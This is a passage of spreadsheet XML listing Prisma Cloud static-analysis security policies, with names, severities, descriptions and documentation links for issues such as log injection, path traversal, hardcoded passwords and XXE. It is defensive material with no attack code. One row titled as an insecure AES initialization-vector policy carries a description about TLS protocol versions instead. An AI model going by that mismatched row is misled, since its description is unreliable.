      <c r="Q473" t="inlineStr"/>
      <c r="R473" t="inlineStr"/>
      <c r="S473" t="inlineStr"/>
      <c r="T473" t="b">
        <v>0</v>
      </c>
      <c r="U473" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V473" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W473" t="inlineStr">
        <is>
          <t>Log data from untrusted sources without validation is risky, allowing attackers to manipulate logs, inject code, and exploit vulnerabilities. Encode user input with StringEscapeUtils.escapeJava(value) for mitigation.</t>
        </is>
      </c>
      <c r="X473" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-120</t>
        </is>
      </c>
      <c r="Y473" t="inlineStr"/>
      <c r="Z473" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA473" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB473" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC473" t="inlineStr">
        <is>
          <t>CKV3_SAST_120</t>
        </is>
      </c>
      <c r="AD473" t="b">
        <v>1</v>
      </c>
      <c r="AE473" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF473" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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3" t="inlineStr">
        <is>
          <t>70ff518c-4cff-41a3-aca7-e0c39f64f8c9</t>
        </is>
      </c>
      <c r="AI473" t="inlineStr"/>
      <c r="AJ473" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK473" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="474">
      <c r="A474" t="inlineStr"/>
      <c r="B474" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C474" s="2" t="inlineStr"/>
      <c r="D474" t="inlineStr"/>
      <c r="E474" t="inlineStr"/>
      <c r="F474" t="inlineStr"/>
      <c r="G474" t="b">
        <v>1</v>
      </c>
      <c r="H4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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J474" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K474" t="inlineStr">
        <is>
          <t>Cookie created without HttpOnly flag</t>
        </is>
      </c>
      <c r="L474" t="inlineStr"/>
      <c r="M474" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N474" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O474" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P474" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q474" t="inlineStr"/>
      <c r="R474" t="inlineStr"/>
      <c r="S474" t="inlineStr"/>
      <c r="T474" t="b">
        <v>0</v>
      </c>
      <c r="U474" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V474" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W474" t="inlineStr">
        <is>
          <t>A new cookie is created without the HttpOnly flag set. The HttpOnly flag is a directive to the browser to make sure that the cookie cannot be read by scripts. This prevents disclosure in the event of a \"Cross-Site Scripting\" attack.</t>
        </is>
      </c>
      <c r="X474" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-16</t>
        </is>
      </c>
      <c r="Y474" t="inlineStr"/>
      <c r="Z474" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA474" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB474" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC474" t="inlineStr">
        <is>
          <t>CKV3_SAST_16</t>
        </is>
      </c>
      <c r="AD474" t="b">
        <v>1</v>
      </c>
      <c r="AE474" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF474" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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4" t="inlineStr">
        <is>
          <t>513cd937-b96d-40f8-aa4b-f4cb1573e5a7</t>
        </is>
      </c>
      <c r="AI474" t="inlineStr"/>
      <c r="AJ474" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK474" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="475">
      <c r="A475" t="inlineStr"/>
      <c r="B475" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C475" s="2" t="inlineStr"/>
      <c r="D475" t="inlineStr"/>
      <c r="E475" t="inlineStr"/>
      <c r="F475" t="inlineStr"/>
      <c r="G475" t="b">
        <v>1</v>
      </c>
      <c r="H4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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J475" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K475" t="inlineStr">
        <is>
          <t>Dynamic path construction risk</t>
        </is>
      </c>
      <c r="L475" t="inlineStr"/>
      <c r="M475" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N475" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O475" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P475" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q475" t="inlineStr"/>
      <c r="R475" t="inlineStr"/>
      <c r="S475" t="inlineStr"/>
      <c r="T475" t="b">
        <v>0</v>
      </c>
      <c r="U475" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V475" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W475" t="inlineStr">
        <is>
          <t>This policy identifies potential path traversal vulnerabilities in Go (Golang) code, where dynamically constructed file or path information may come from user input. Such vulnerabilities can be exploited to read sensitive files, access other users' data, or aid in further system exploitation.</t>
        </is>
      </c>
      <c r="X475" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/golang-policies/sast-policy-252</t>
        </is>
      </c>
      <c r="Y475" t="inlineStr"/>
      <c r="Z475" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA475" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB475" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC475" t="inlineStr">
        <is>
          <t>CKV3_SAST_252</t>
        </is>
      </c>
      <c r="AD475" t="b">
        <v>1</v>
      </c>
      <c r="AE475" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF475" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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5" t="inlineStr">
        <is>
          <t>b5944dac-6dc5-4507-91bd-66d2cb6293d4</t>
        </is>
      </c>
      <c r="AI475" t="inlineStr"/>
      <c r="AJ475" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK475" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="476">
      <c r="A476" t="inlineStr"/>
      <c r="B476" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C476" s="2" t="inlineStr"/>
      <c r="D476" t="inlineStr"/>
      <c r="E476" t="inlineStr"/>
      <c r="F476" t="inlineStr"/>
      <c r="G476" t="b">
        <v>1</v>
      </c>
      <c r="H4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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J476" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K476" t="inlineStr">
        <is>
          <t>Unsafe Go package in use</t>
        </is>
      </c>
      <c r="L476" t="inlineStr"/>
      <c r="M476" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N476" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O476" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P476" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q476" t="inlineStr"/>
      <c r="R476" t="inlineStr"/>
      <c r="S476" t="inlineStr"/>
      <c r="T476" t="b">
        <v>0</v>
      </c>
      <c r="U476" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V476" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W476" t="inlineStr">
        <is>
          <t>This policy identifies the use of the unsafe package in Go applications. The unsafe package allows operations that can break type safety, memory safety, and cause unpredictable behavior, undermining the language's guarantees and potentially leading to difficult-to-debug errors. It is recommended to avoid using the unsafe package to maintain the safety and reliability of the code.</t>
        </is>
      </c>
      <c r="X476" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/golang-policies/sast-policy-243</t>
        </is>
      </c>
      <c r="Y476" t="inlineStr"/>
      <c r="Z476" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA476" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB476" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC476" t="inlineStr">
        <is>
          <t>CKV3_SAST_243</t>
        </is>
      </c>
      <c r="AD476" t="b">
        <v>1</v>
      </c>
      <c r="AE476" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF476" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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6" t="inlineStr">
        <is>
          <t>98fc6d63-6555-43c9-bff4-60e50e498590</t>
        </is>
      </c>
      <c r="AI476" t="inlineStr"/>
      <c r="AJ476" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK476" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="477">
      <c r="A477" t="inlineStr"/>
      <c r="B477" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C477" s="2" t="inlineStr"/>
      <c r="D477" t="inlineStr"/>
      <c r="E477" t="inlineStr"/>
      <c r="F477" t="inlineStr"/>
      <c r="G477" t="b">
        <v>1</v>
      </c>
      <c r="H4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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J477" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K477" t="inlineStr">
        <is>
          <t>None attributes accessed</t>
        </is>
      </c>
      <c r="L477" t="inlineStr"/>
      <c r="M477" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N477" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O477" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P477" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q477" t="inlineStr"/>
      <c r="R477" t="inlineStr"/>
      <c r="S477" t="inlineStr"/>
      <c r="T477" t="b">
        <v>0</v>
      </c>
      <c r="U477" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V477" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W477" t="inlineStr">
        <is>
          <t>Accessing attributes of None value throws an AttributeError that might expose sensitive debugging information to attackers.</t>
        </is>
      </c>
      <c r="X477" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-73</t>
        </is>
      </c>
      <c r="Y477" t="inlineStr"/>
      <c r="Z477" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA477" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB477" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC477" t="inlineStr">
        <is>
          <t>CKV3_SAST_73</t>
        </is>
      </c>
      <c r="AD477" t="b">
        <v>1</v>
      </c>
      <c r="AE477" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF477" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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7" t="inlineStr">
        <is>
          <t>81669e48-ce4c-4fde-a94c-61fb0f1442f2</t>
        </is>
      </c>
      <c r="AI477" t="inlineStr"/>
      <c r="AJ477" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK477" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="478">
      <c r="A478" t="inlineStr"/>
      <c r="B478" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C478" s="2" t="inlineStr"/>
      <c r="D478" t="inlineStr"/>
      <c r="E478" t="inlineStr"/>
      <c r="F478" t="inlineStr"/>
      <c r="G478" t="b">
        <v>1</v>
      </c>
      <c r="H4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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J478" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K478" t="inlineStr">
        <is>
          <t>Hardcoded passwords are being used</t>
        </is>
      </c>
      <c r="L478" t="inlineStr"/>
      <c r="M478" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N478" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O478" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P478" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q478" t="inlineStr"/>
      <c r="R478" t="inlineStr"/>
      <c r="S478" t="inlineStr"/>
      <c r="T478" t="b">
        <v>0</v>
      </c>
      <c r="U478" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V478" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W478" t="inlineStr">
        <is>
          <t>Hardcoded password is used as a default argument to '$FUNC'. This could be dangerous if a real password is not supplied.</t>
        </is>
      </c>
      <c r="X478" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-152</t>
        </is>
      </c>
      <c r="Y478" t="inlineStr"/>
      <c r="Z478" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA478" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB478" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC478" t="inlineStr">
        <is>
          <t>CKV3_SAST_152</t>
        </is>
      </c>
      <c r="AD478" t="b">
        <v>1</v>
      </c>
      <c r="AE478" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF478" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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8" t="inlineStr">
        <is>
          <t>b0926f36-4512-4c0b-a5fe-84fc29d6a16e</t>
        </is>
      </c>
      <c r="AI478" t="inlineStr"/>
      <c r="AJ478" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK478" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="479">
      <c r="A479" t="inlineStr"/>
      <c r="B479" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C479" s="2" t="inlineStr"/>
      <c r="D479" t="inlineStr"/>
      <c r="E479" t="inlineStr"/>
      <c r="F479" t="inlineStr"/>
      <c r="G479" t="b">
        <v>1</v>
      </c>
      <c r="H4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79" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J479" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K479" t="inlineStr">
        <is>
          <t>Use of insufficiently random values from random module</t>
        </is>
      </c>
      <c r="L479" t="inlineStr"/>
      <c r="M479" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N479" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O479" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P479" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q479" t="inlineStr"/>
      <c r="R479" t="inlineStr"/>
      <c r="S479" t="inlineStr"/>
      <c r="T479" t="b">
        <v>0</v>
      </c>
      <c r="U479" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V479" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W479" t="inlineStr">
        <is>
          <t>Standard pseudo-random generators are not suitable for security/cryptographic purposes.</t>
        </is>
      </c>
      <c r="X479" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-167</t>
        </is>
      </c>
      <c r="Y479" t="inlineStr"/>
      <c r="Z479" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA479" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB479" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC479" t="inlineStr">
        <is>
          <t>CKV3_SAST_167</t>
        </is>
      </c>
      <c r="AD479" t="b">
        <v>1</v>
      </c>
      <c r="AE479" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF479" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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79" t="inlineStr">
        <is>
          <t>ea91c03b-70c6-4837-844d-e36e43520e00</t>
        </is>
      </c>
      <c r="AI479" t="inlineStr"/>
      <c r="AJ479" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK479" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="480">
      <c r="A480" t="inlineStr"/>
      <c r="B480" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C480" s="2" t="inlineStr"/>
      <c r="D480" t="inlineStr"/>
      <c r="E480" t="inlineStr"/>
      <c r="F480" t="inlineStr"/>
      <c r="G480" t="b">
        <v>1</v>
      </c>
      <c r="H4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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J480" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K480" t="inlineStr">
        <is>
          <t>Active Debug Code</t>
        </is>
      </c>
      <c r="L480" t="inlineStr"/>
      <c r="M480" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N480" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O480" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P480" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q480" t="inlineStr"/>
      <c r="R480" t="inlineStr"/>
      <c r="S480" t="inlineStr"/>
      <c r="T480" t="b">
        <v>0</v>
      </c>
      <c r="U480" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V480" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W480" t="inlineStr">
        <is>
          <t>Detected Flask app with `debug=True`. Do not deploy to production with this flag enabled as it will leak sensitive information. Instead, consider using Flask configuration variables or setting `debug` using system environment variables.</t>
        </is>
      </c>
      <c r="X480" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-96</t>
        </is>
      </c>
      <c r="Y480" t="inlineStr"/>
      <c r="Z480" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA480" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB480" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC480" t="inlineStr">
        <is>
          <t>CKV3_SAST_96</t>
        </is>
      </c>
      <c r="AD480" t="b">
        <v>1</v>
      </c>
      <c r="AE480" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF480" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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0" t="inlineStr">
        <is>
          <t>a26c6363-95f2-478f-b50d-12b41b96057b</t>
        </is>
      </c>
      <c r="AI480" t="inlineStr"/>
      <c r="AJ480" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK480" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="481">
      <c r="A481" t="inlineStr"/>
      <c r="B481" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C481" s="2" t="inlineStr"/>
      <c r="D481" t="inlineStr"/>
      <c r="E481" t="inlineStr"/>
      <c r="F481" t="inlineStr"/>
      <c r="G481" t="b">
        <v>1</v>
      </c>
      <c r="H4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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J481" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K481" t="inlineStr">
        <is>
          <t>Insecure AES initialization vector usage</t>
        </is>
      </c>
      <c r="L481" t="inlineStr"/>
      <c r="M481" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N481" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O481" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P481" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q481" t="inlineStr"/>
      <c r="R481" t="inlineStr"/>
      <c r="S481" t="inlineStr"/>
      <c r="T481" t="b">
        <v>0</v>
      </c>
      <c r="U481" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V481" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W481" t="inlineStr">
        <is>
          <t>The use of insecure TLS protocol versions (i.e. a protocol different from \"TLSv1.2\", \"TLSv1.3\", \"DTLSv1.2\", or \"DTLSv1.3\") is not recommended. TLS 1.2 should be set as the minimum protocol version.</t>
        </is>
      </c>
      <c r="X481" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-68</t>
        </is>
      </c>
      <c r="Y481" t="inlineStr"/>
      <c r="Z481" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA481" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB481" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC481" t="inlineStr">
        <is>
          <t>CKV3_SAST_68</t>
        </is>
      </c>
      <c r="AD481" t="b">
        <v>1</v>
      </c>
      <c r="AE481" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF481" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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1" t="inlineStr">
        <is>
          <t>4f408359-5568-4013-b8ba-e2c92562ad29</t>
        </is>
      </c>
      <c r="AI481" t="inlineStr"/>
      <c r="AJ481" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK481" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="482">
      <c r="A482" t="inlineStr"/>
      <c r="B482" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C482" s="2" t="inlineStr"/>
      <c r="D482" t="inlineStr"/>
      <c r="E482" t="inlineStr"/>
      <c r="F482" t="inlineStr"/>
      <c r="G482" t="b">
        <v>1</v>
      </c>
      <c r="H4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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J482" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K482" t="inlineStr">
        <is>
          <t>Use of RSA algorithm without OAEP</t>
        </is>
      </c>
      <c r="L482" t="inlineStr"/>
      <c r="M482" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N482" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O482" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P482" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q482" t="inlineStr"/>
      <c r="R482" t="inlineStr"/>
      <c r="S482" t="inlineStr"/>
      <c r="T482" t="b">
        <v>0</v>
      </c>
      <c r="U482" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V482" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W482" t="inlineStr">
        <is>
          <t>The software uses the RSA algorithm but does not incorporate Optimal Asymmetric Encryption Padding (OAEP). By not enabling padding, the algorithm maybe vulnerable to chosen plaintext attacks. To enable OAEP mode, pass `RSA/ECB/OAEPWithSHA-256AndMGF1Padding` to the `Cipher.getInstance` method.</t>
        </is>
      </c>
      <c r="X482" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-156</t>
        </is>
      </c>
      <c r="Y482" t="inlineStr"/>
      <c r="Z482" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA482" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB482" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC482" t="inlineStr">
        <is>
          <t>CKV3_SAST_156</t>
        </is>
      </c>
      <c r="AD482" t="b">
        <v>1</v>
      </c>
      <c r="AE482" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF482" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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2" t="inlineStr">
        <is>
          <t>0f598e83-bedc-463a-be39-08838b29e093</t>
        </is>
      </c>
      <c r="AI482" t="inlineStr"/>
      <c r="AJ482" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK482" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="483">
      <c r="A483" t="inlineStr"/>
      <c r="B483" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C483" s="2" t="inlineStr"/>
      <c r="D483" t="inlineStr"/>
      <c r="E483" t="inlineStr"/>
      <c r="F483" t="inlineStr"/>
      <c r="G483" t="b">
        <v>1</v>
      </c>
      <c r="H4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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J483" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K483" t="inlineStr">
        <is>
          <t>XML Parsers exposed to XXE Vulnerabilities</t>
        </is>
      </c>
      <c r="L483" t="inlineStr"/>
      <c r="M483" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N483" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O483" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P483" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q483" t="inlineStr"/>
      <c r="R483" t="inlineStr"/>
      <c r="S483" t="inlineStr"/>
      <c r="T483" t="b">
        <v>0</v>
      </c>
      <c r="U483" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V483" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W483" t="inlineStr">
        <is>
          <t>Detected a vulnerable in XML parsers</t>
        </is>
      </c>
      <c r="X483" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-50</t>
        </is>
      </c>
      <c r="Y483" t="inlineStr"/>
      <c r="Z483" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA483" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB483" t="inlineStr">
        <is>
